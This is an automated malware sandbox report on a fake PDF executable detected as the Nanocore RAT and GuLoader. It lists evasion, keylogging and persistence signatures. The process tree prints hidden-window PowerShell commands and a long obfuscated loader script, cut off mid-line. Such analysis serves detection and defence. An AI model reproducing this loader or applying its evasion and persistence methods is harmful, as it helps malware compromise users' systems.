Edit tour
Windows
Analysis Report
Certificate#U00b7pdf.exe
Overview
General Information
Detection
Nanocore, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected GuLoader
Yara detected Nanocore RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Sigma detected: Potential PowerShell Command Line Obfuscation
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64native
- Certificate#U00b7pdf.exe (PID: 4180 cmdline:
"C:\Users\ user\Deskt op\Certifi cate#U00b7 pdf.exe" MD5: 6DB7BB3D97AFA79630D4085427E93BDF) - powershell.exe (PID: 5620 cmdline:
powershell .exe -wind owstyle hi dden $cas = Get-Cont ent 'C:\Us ers\user\A ppData\Loc al\Skamfle lsens\fame less\Imita bility\Ild daabens\Ko mmandosynt aksen.Knk' ; powersh ell.exe '' $cas'' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 4800 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - powershell.exe (PID: 5828 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Fordaer vet Kauch Ticklenbur g Synonymi zed Nipper s Hysse #> $Boarspear = """Pe;R eF SuSunSk c OtPri Po Cn D AeBC arTju Cd K g coAsmSem Dee M0Wa4 K B{St Do Tr U KopTe aFor oaatm No(Ov[HaSP ot Fr UiSl nSpgVo] H` $PiS Ca Ul SteAns FwD io Om Fe U n p)Re; D De d A D`$ RT Fh viC hoOpt Ch W r Ti Ex T No= R SNNo eInwUd-OcO Reb UjFoe ScGotOc Me bMiyLdtPre In[Fo] P S c(Ib`$ CSS pa ll UeEn s MwSeoGdm BeDynAn.I nL De An B gJot Ch P Fo/Co A2Su ) I; D Ma Sc F FlFFy oSlrMe(Sc` $ PA DnPit Pai FlMuaT rbAso PrSk s K=Pa0Ra; Bi B`$BaA Nn GtPoi L lspaRabHvo SrBls V P r- Ml AtBo Fa`$PaSDi a SlOpeBas lew So Sm Ze MnSl.Ly LVaeDrn Yg Ft Dh T;I l Lf`$ PA pnHyt Ci N lEkaTabFio StrSks C+ I=Li2An)Af {Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei Sog utBehinr u iVaxUn[Ta` $BiAYondat SiRelIma AbGuo Nr W s t/ T2 P] F No= O P a[uncGloIn n BvPye Sr UntSe]Im: U:CaTTho P BSyyantAue Un(Fj`$ SS Ia Tl SeM es Fw Bo b mfoeBonSu. KlS au Kb Ss MtLor T iSpnAng Z( St`$PhAUnn satBui HlF oaMybMioSo rTus D, I Er2un) G,I n au1Mu6Ca )Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi D xSv[ar`$Ga ACinTrtEdi Slbra NbI no Or AsTa /Tr2Sk]Br P=Ud Un(Su `$SaTIthEf iBao Ct Bh AlrFli Txg a[Pa`$SnAW inBrt CiUn lKraOdbMeo ArHlsMi/S p2Vi]Br L- FobVaxSpoD erCa K1 S1 Fo8Mb) f;S y P L Y Ty }Re Ki[ DS Ent Sr FiA nnStgSl]St [SaS KyGis Lt Ue fmP a. STPle p xgotAb. SE BrnSuc Ko rdAfiunn P g b] K: S: RA IS SCS lI LINo.Te G de BtAmS ditPur Zi PnHag T(Ca `$DaTGrhCi iscoUntRuh RorUsiSax M)As;Dd} s `$ViS PkOa rfim Ga Ar mbMae SjA md Re OsEp 0 O=InBDer BauVid SgN ooInmHymSk eDa0Ar4 I Bo' D2Ek5N u0StFFa0Hu 5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma 2 I1 NAAn1 BiAPe' S;P r`$ KSUdkL arMum Jaud rAfb ReKlj AdAkeBrsS t1fo=GoBBr r PuTrdPeg ProLam Pma me P0Gu4 R Uf' R3MiB bl1YnFAs1 R5Ec0My4 M 1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M 5Ra8No2 A1 De1 SFTo1 I8 R4Op5 R 4Pa4Ni5 S8 J2 O3St1K o8 S0Be5in 1In7ud1Ov0 Fo1 b3 S3U n8Bi1 L7 L 0 K2Fl1 MF E0Ma0Ov1Q u3Ge3 bBEr 1De3cl0Fi2 K1 OESc1 B9 L1 A2 M 0 B5Ko'Ou; F`$SlS sk HkrStm CaA nr UbExe A jKodTre As Sk2Ge= FBG ar suScdIm gSkoKam sm DePr0Co4B r Sa' A3 S 1Ko1Sj3Ja0 S2Un2 L6S c0Bu4 M1Be 9 I1 G5 D3 Sp7 S1Dy2W i1 S2 G0 E 4 P1In3 A0 V5Bt0Bu5I n'mo;sm`$P rSSik IrGr mafa ArUnb Ste SjModP ieVas H3Av =PjB Mr Bu udOlg woW im Mm Me U 0ha4 S De' F2 v5Sw0o bFAs0fo5 B 0 S2Ma1 S3 S1 FBMo5D o8Ge2V 4Us 0 A3 s1 M8 Xa0Sl2Fl1V eF S1DeB Q 1 U3ma5 a8 Re3AnFWi1 G8 T0 D2Sy 1po3Ny0 D4 Bo1 E9 S0F o6 P2Av5 L 1Re3Un0sn4 Ag0Co0ba1 FF T1 P5 o 1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T 1nu8Vr1Gr2 R1MiA S1R a3Ge2Un4 U 1Ov3 C1Ud0 Hd'Ro;Ru`$ JoS UkAfr Sm IaSerMo b IeFljUdd WieFes G4 K= IB Krdr uTidDegNoo cmbim keW a0 P4Ru Se 'Te0Di5Re0 Un2Pr0Co4